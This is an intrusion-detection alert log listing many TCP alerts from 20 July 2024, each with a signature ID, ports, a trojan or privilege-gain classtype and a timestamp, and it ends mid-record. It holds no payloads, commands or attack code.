                      SID:2027339
                      Source Port:56050
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:40.334452
                      SID:2829579
                      Source Port:50810
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:00:59.191389
                      SID:2835222
                      Source Port:34754
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:02.055683
                      SID:2835222
                      Source Port:40528
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:41.279072
                      SID:2025132
                      Source Port:50020
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted User Privilege Gain
                      Timestamp:07/20/24-23:01:44.373922
                      SID:2027339
                      Source Port:52258
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:02:26.420170
                      SID:2027339
                      Source Port:36260
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:58.202290
                      SID:2027339
                      Source Port:34350
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:43.994464
                      SID:2025132
                      Source Port:39712
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted User Privilege Gain
                      Timestamp:07/20/24-23:01:48.016319
                      SID:2025132
                      Source Port:42084
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted User Privilege Gain
                      Timestamp:07/20/24-23:02:09.704983
                      SID:2027339
                      Source Port:56436
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:21.923917
                      SID:2829579
                      Source Port:46286
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:13.994729
                      SID:2025132
                      Source Port:50988
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted User Privilege Gain
                      Timestamp:07/20/24-23:01:11.180811
                      SID:2027339
                      Source Port:40870
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:31.976984
                      SID:2829579
                      Source Port:40258
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:02:07.942303
                      SID:2025132
                      Source Port:48530
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted User Privilege Gain
                      Timestamp:07/20/24-23:01:24.889164
                      SID:2829579
                      Source Port:52336
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:56.991428
                      SID:2025132
                      Source Port:53144
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted User Privilege Gain
                      Timestamp:07/20/24-23:01:31.982478
                      SID:2829579
                      Source Port:48318
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:48.286177
                      SID:2027339
                      Source Port:59364
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:07.061779
                      SID:2835222
                      Source Port:40284
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:02:00.413915
                      SID:2027339
                      Source Port:49516
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:43.917774
                      SID:2027339
                      Source Port:42596
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:44.944699
                      SID:2831300
                      Source Port:56168
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted Administrator Privilege Gain
                      Timestamp:07/20/24-23:02:00.113044
                      SID:2025132
                      Source Port:47818
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted User Privilege Gain
                      Timestamp:07/20/24-23:00:59.168569
                      SID:2829579
                      Source Port:43828
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:11.818842
                      SID:2835222
                      Source Port:60604
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:53.697003
                      SID:2025132
                      Source Port:49450
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted User Privilege Gain
                      Timestamp:07/20/24-23:01:02.048113
                      SID:2829579
                      Source Port:57456
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:08.555688
                      SID:2027339
                      Source Port:59662
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:41.345953
                      SID:2027339
                      Source Port:59176
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:11.822392
                      SID:2835222
                      Source Port:41642
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:43.515688
                      SID:2025132
                      Source Port:53120
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted User Privilege Gain
                      Timestamp:07/20/24-23:01:43.013772
                      SID:2025132
                      Source Port:41218
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted User Privilege Gain
                      Timestamp:07/20/24-23:01:11.639230
                      SID:2835222
                      Source Port:42332
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:44.589820
                      SID:2831300
                      Source Port:41334
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted Administrator Privilege Gain
                      Timestamp:07/20/24-23:01:07.036064
                      SID:2835222
                      Source Port:33808
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:20.592206
                      SID:2831300
                      Source Port:40964
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted Administrator Privilege Gain
                      Timestamp:07/20/24-23:01:55.994693
                      SID:2025132
                      Source Port:44766
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted User Privilege Gain
                      Timestamp:07/20/24-23:01:47.729778
                      SID:2831300
                      Source Port:54816
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted Administrator Privilege Gain
                      Timestamp:07/20/24-23:01:42.000471
                      SID:2027339
                      Source Port:46648
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:42.574571
                      SID:2831300
                      Source Port:49190
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted Administrator Privilege Gain
                      Timestamp:07/20/24-23:01:53.372532
                      SID:2831300
                      Source Port:33828
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted Administrator Privilege Gain
                      Timestamp:07/20/24-23:01:31.977603
                      SID:2835222
                      Source Port:47744
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:42.514942
                      SID:2027339
                      Source Port:32936
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:41.399866
                      SID:2025132
                      Source Port:44060
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted User Privilege Gain
                      Timestamp:07/20/24-23:01:42.500263
                      SID:2025132
                      Source Port:38876
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted User Privilege Gain
                      Timestamp:07/20/24-23:01:47.569820
                      SID:2027339
                      Source Port:59236
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:41.330687
                      SID:2025132
                      Source Port:52750
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted User Privilege Gain
                      Timestamp:07/20/24-23:00:57.221550
                      SID:2829579
                      Source Port:37826
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:00:59.172943
                      SID:2835222
                      Source Port:50406
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:08.611773
                      SID:2831300
                      Source Port:39856
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted Administrator Privilege Gain
                      Timestamp:07/20/24-23:01:31.974837
                      SID:2835222
                      Source Port:35808
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:08.559170
                      SID:2831300
                      Source Port:47126
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted Administrator Privilege Gain
                      Timestamp:07/20/24-23:01:53.697942
                      SID:2831300
                      Source Port:59366
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted Administrator Privilege Gain
                      Timestamp:07/20/24-23:01:48.496838
                      SID:2025132
                      Source Port:58716
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted User Privilege Gain
                      Timestamp:07/20/24-23:01:40.334452
                      SID:2829579
                      Source Port:35542
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:06.991143
                      SID:2835222
                      Source Port:55808
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:11.631728
                      SID:2835222
                      Source Port:58466
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:50.380701
                      SID:2027339
                      Source Port:40426
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:45.098864
                      SID:2831300
                      Source Port:52864
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted Administrator Privilege Gain
                      Timestamp:07/20/24-23:01:51.021834
                      SID:2025132
                      Source Port:53978
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted User Privilege Gain
                      Timestamp:07/20/24-23:01:04.996043
                      SID:2027339
                      Source Port:52076
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:43.994464
                      SID:2027339
                      Source Port:34850
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:00.634292
                      SID:2835222
                      Source Port:36066
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:04.085431
                      SID:2835222
                      Source Port:53176
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:41.318733
                      SID:2025132
                      Source Port:59840
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted User Privilege Gain
                      Timestamp:07/20/24-23:01:00.637175
                      SID:2829579
                      Source Port:51926
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:51.360754
                      SID:2027339
                      Source Port:33704
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:47.995202
                      SID:2025132
                      Source Port:60130
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted User Privilege Gain
                      Timestamp:07/20/24-23:01:51.161030
                      SID:2027339
                      Source Port:45950
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:02:03.032025
                      SID:2025132
                      Source Port:53862
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted User Privilege Gain
                      Timestamp:07/20/24-23:01:31.976984
                      SID:2835222
                      Source Port:41924
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:11.636599
                      SID:2829579
                      Source Port:43754
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:20.131340
                      SID:2829579
                      Source Port:53976
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:52.144379
                      SID:2831300
                      Source Port:58952
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted Administrator Privilege Gain
                      Timestamp:07/20/24-23:01:53.654810
                      SID:2027339
                      Source Port:46434
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:00.637175
                      SID:2835222
                      Source Port:58502
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:11.636599
                      SID:2835222
                      Source Port:38786
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:00:59.211046
                      SID:2829579
                      Source Port:41502
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:24.944299
                      SID:2829579
                      Source Port:42332
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:08.683684
                      SID:2027339
                      Source Port:34076
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:43.905912
                      SID:2027339
                      Source Port:36034
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:02:00.062043
                      SID:2027339
                      Source Port:48916
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:02.320024
                      SID:2027339
                      Source Port:57946
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:59.707283
                      SID:2025132
                      Source Port:38118
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted User Privilege Gain
                      Timestamp:07/20/24-23:01:04.049279
                      SID:2829579
                      Source Port:49124
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:31.333071
                      SID:2027339
                      Source Port:39858
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:04.040812
                      SID:2829579
                      Source Port:48880
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:02:12.142469
                      SID:2831300
                      Source Port:46094
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted Administrator Privilege Gain
                      Timestamp:07/20/24-23:01:03.235405
                      SID:2025132
                      Source Port:58548
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted User Privilege Gain
                      Timestamp:07/20/24-23:01:44.320661
                      SID:2027339
                      Source Port:34236
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:14.126869
                      SID:2835222
                      Source Port:47980
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:43.160906
                      SID:2027339
                      Source Port:60250
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:24.071868
                      SID:2027339
                      Source Port:57942
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:44.589820
                      SID:2831300
                      Source Port:55584
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted Administrator Privilege Gain
                      Timestamp:07/20/24-23:01:21.915268
                      SID:2829579
                      Source Port:39240
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:06.975117
                      SID:2829579
                      Source Port:32942
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:49.463055
                      SID:2027339
                      Source Port:47496
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:41.290281
                      SID:2027339
                      Source Port:54992
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:47.572503
                      SID:2831300
                      Source Port:45032
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted Administrator Privilege Gain
                      Timestamp:07/20/24-23:01:51.441890
                      SID:2831300
                      Source Port:50686
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted Administrator Privilege Gain
                      Timestamp:07/20/24-23:01:54.177524
                      SID:2025132
                      Source Port:56158
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted User Privilege Gain
                      Timestamp:07/20/24-23:01:32.059767
                      SID:2829579
                      Source Port:45268
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:20.591350
                      SID:2831300
                      Source Port:42172
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted Administrator Privilege Gain
                      Timestamp:07/20/24-23:01:20.157619
                      SID:2829579
                      Source Port:55882
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:42.751499
                      SID:2831300
                      Source Port:48762
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted Administrator Privilege Gain
                      Timestamp:07/20/24-23:01:44.713195
                      SID:2025132
                      Source Port:58376
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted User Privilege Gain
                      Timestamp:07/20/24-23:01:06.973541
                      SID:2829579
                      Source Port:49004
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:34.055714
                      SID:2835222
                      Source Port:36492
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:01.182969
                      SID:2027339
                      Source Port:59766
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:42.692691
                      SID:2831300
                      Source Port:59040
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted Administrator Privilege Gain
                      Timestamp:07/20/24-23:01:11.818830
                      SID:2829579
                      Source Port:57220
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:53.132473
                      SID:2025132
                      Source Port:42802
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted User Privilege Gain
                      Timestamp:07/20/24-23:01:58.202290
                      SID:2025132
                      Source Port:44848
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted User Privilege Gain
                      Timestamp:07/20/24-23:02:01.796252
                      SID:2025132
                      Source Port:45564
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted User Privilege Gain
                      Timestamp:07/20/24-23:01:20.593003
                      SID:2027339
                      Source Port:44018
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:40.323034
                      SID:2835222
                      Source Port:57026
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:02.729047
                      SID:2027339
                      Source Port:49722
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:42.854321
                      SID:2027339
                      Source Port:44544
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:00:56.851055
                      SID:2030490
                      Source Port:32848
                      Destination Port:2466
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:34.045143
                      SID:2835222
                      Source Port:59604
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:21.954501
                      SID:2835222
                      Source Port:50736
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:24.060711
                      SID:2027339
                      Source Port:46302
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:25.994344
                      SID:2025132
                      Source Port:37924
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted User Privilege Gain
                      Timestamp:07/20/24-23:01:51.400635
                      SID:2025132
                      Source Port:35330
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted User Privilege Gain
                      Timestamp:07/20/24-23:01:42.006483
                      SID:2831300
                      Source Port:41766
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted Administrator Privilege Gain
                      Timestamp:07/20/24-23:01:01.868178
                      SID:2027339
                      Source Port:47262
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:41.263056
                      SID:2025132
                      Source Port:51596
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted User Privilege Gain
                      Timestamp:07/20/24-23:01:11.631937
                      SID:2835222
                      Source Port:60474
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:42.622797
                      SID:2027339
                      Source Port:50476
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:43.088724
                      SID:2831300
                      Source Port:42460
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted Administrator Privilege Gain
                      Timestamp:07/20/24-23:01:08.621030
                      SID:2027339
                      Source Port:43122
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:31.317774
                      SID:2027339
                      Source Port:42478
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:59.104072
                      SID:2027339
                      Source Port:49432
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:44.144821
                      SID:2025132
                      Source Port:57366
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted User Privilege Gain
                      Timestamp:07/20/24-23:01:46.113314
                      SID:2831300
                      Source Port:55710
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted Administrator Privilege Gain
                      Timestamp:07/20/24-23:01:48.047800
                      SID:2027339
                      Source Port:53322
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:51.244491
                      SID:2027339
                      Source Port:45482
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:47.433470
                      SID:2027339
                      Source Port:40136
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:45.513282
                      SID:2027339
                      Source Port:45548
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:41.974742
                      SID:2831300
                      Source Port:60824
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted Administrator Privilege Gain
                      Timestamp:07/20/24-23:01:42.935667
                      SID:2025132
                      Source Port:53490
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted User Privilege Gain
                      Timestamp:07/20/24-23:01:08.619598
                      SID:2831300
                      Source Port:43258
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted Administrator Privilege Gain
                      Timestamp:07/20/24-23:01:26.138638
                      SID:2027339
                      Source Port:44014
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:10.698072
                      SID:2027339
                      Source Port:45622
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:44.440143
                      SID:2027339
                      Source Port:54228
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:49.463055
                      SID:2831300
                      Source Port:52582
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted Administrator Privilege Gain
                      Timestamp:07/20/24-23:01:27.650505
                      SID:2829579
                      Source Port:51726
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:42.912947
                      SID:2027339
                      Source Port:44764
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:08.919725
                      SID:2027339
                      Source Port:45992
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:00:57.220949
                      SID:2829579
                      Source Port:53130
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:00.638305
                      SID:2835222
                      Source Port:42912
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:53.132473
                      SID:2831300
                      Source Port:43602
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted Administrator Privilege Gain
                      Timestamp:07/20/24-23:01:40.286738
                      SID:2829579
                      Source Port:42938
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:48.216693
                      SID:2027339
                      Source Port:49644
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:12.853279
                      SID:2027339
                      Source Port:41360
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:53.429797
                      SID:2027339
                      Source Port:47720
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:58.717674
                      SID:2027339
                      Source Port:60566
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:00:59.196993
                      SID:2835222
                      Source Port:59916
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:54.922661
                      SID:2027339
                      Source Port:46738
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:48.221889
                      SID:2831300
                      Source Port:59484
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted Administrator Privilege Gain
                      Timestamp:07/20/24-23:01:47.108019
                      SID:2025132
                      Source Port:58110
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted User Privilege Gain
                      Timestamp:07/20/24-23:01:42.898615
                      SID:2027339
                      Source Port:47258
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:02:09.758048
                      SID:2025132
                      Source Port:53308
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted User Privilege Gain
                      Timestamp:07/20/24-23:01:08.667963
                      SID:2027339
                      Source Port:39612
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:21.954501
                      SID:2835222
                      Source Port:49030
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:02:03.245732
                      SID:2025132
                      Source Port:37204
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted User Privilege Gain
                      Timestamp:07/20/24-23:01:47.006773
                      SID:2831300
                      Source Port:37276
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted Administrator Privilege Gain
                      Timestamp:07/20/24-23:01:03.115715
                      SID:2025132
                      Source Port:60020
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted User Privilege Gain
                      Timestamp:07/20/24-23:01:08.597662
                      SID:2027339
                      Source Port:34472
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:44.203130
                      SID:2025132
                      Source Port:34246
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted User Privilege Gain
                      Timestamp:07/20/24-23:01:41.340201
                      SID:2025132
                      Source Port:37918
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted User Privilege Gain
                      Timestamp:07/20/24-23:01:44.036421
                      SID:2831300
                      Source Port:49088
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted Administrator Privilege Gain
                      Timestamp:07/20/24-23:01:02.119631
                      SID:2829579
                      Source Port:58596
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:43.555329
                      SID:2027339
                      Source Port:58004
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:06.988055
                      SID:2829579
                      Source Port:58870
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:02.340273
                      SID:2025132
                      Source Port:45948
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted User Privilege Gain
                      Timestamp:07/20/24-23:01:31.977603
                      SID:2829579
                      Source Port:44556
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:43.813001
                      SID:2025132
                      Source Port:60190
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted User Privilege Gain
                      Timestamp:07/20/24-23:01:58.042671
                      SID:2027339
                      Source Port:55608
